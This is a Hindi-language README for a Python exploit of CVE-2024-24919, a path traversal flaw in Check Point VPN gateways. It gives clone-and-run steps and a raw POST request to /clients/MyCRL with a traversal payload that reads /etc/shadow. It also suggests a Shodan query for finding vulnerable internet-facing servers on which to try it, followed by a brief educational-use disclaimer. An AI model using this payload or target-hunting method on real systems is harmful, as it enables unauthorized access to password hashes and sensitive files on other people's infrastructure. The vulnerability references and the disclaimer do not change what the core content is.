
CVE-2024-24919 एक्सप्लॉइट और PoC - रिमोट एक्सेस VPN या मोबाइल एक्सेस के लिए क्रिटिकल LFI।
इस रिपॉजिटरी में CVE-2024-24919 के लिए एक पायथन एक्सप्लॉइट है, यह एक कमजोरी है जो आपको असुरक्षित पेज से संवेदनशील फ़ाइलें पढ़ने की अनुमति देती है।
यह एक्सप्लॉइट पहले जाँचता है कि लक्ष्य असुरक्षित है या नहीं, और फिर आपके द्वारा निर्दिष्ट पथ प्राप्त करता है।
गंभीरता: महत्वपूर्ण
पहले रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
अनुमतियाँ दें और python3 के साथ एक्सप्लॉइट चलाएँ
chmod +x exploit.py
python3 exploit.py
फिर चरणों का पालन करें और आपको निर्दिष्ट फ़ाइल का डेटा मिल जाएगा।
यदि आपको परेशानी हो रही है, तो सुनिश्चित करें कि आपके द्वारा निर्दिष्ट URL मुख्य है।
✓ https://google.com
✘ https://google.com/search?client=firefox
पहले हमें यह सुनिश्चित करना होगा कि वेबसाइट में Check Point Security Gateways हैं जिनमें रिमोट एक्सेस VPN या मोबाइल एक्सेस सॉफ्टवेयर सक्षम है।
इस एक्सप्लॉइट में हम {ip}/clients/MyCRL एंडपॉइंट की ओर इशारा कर रहे हैं।
यह एंडपॉइंट असुरक्षित है यदि हम एक POST अनुरोध करते हैं, हम स्ट्रिंग CSHELL/ और उस फ़ाइल का पथ जोड़ते हैं जिसे हम पथ ट्रैवर्सल का उपयोग करके पढ़ना चाहते हैं।
अनुरोध कुछ इस प्रकार होगा:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
हम यह सब स्रोत कोड को देखकर प्राप्त करते हैं।
प्रक्रिया के बारे में अधिक जानकारी के लिए यह पोस्ट देखें --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
यदि आप इस कमजोरी का परीक्षण करना चाहते हैं, तो आप Sodan का उपयोग करके कुछ असुरक्षित वेबसाइटें ढूंढ सकते हैं, sodan में इस क्वेरी का उपयोग करें:
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिन तक आपके पास पहुँच की अनुमति है।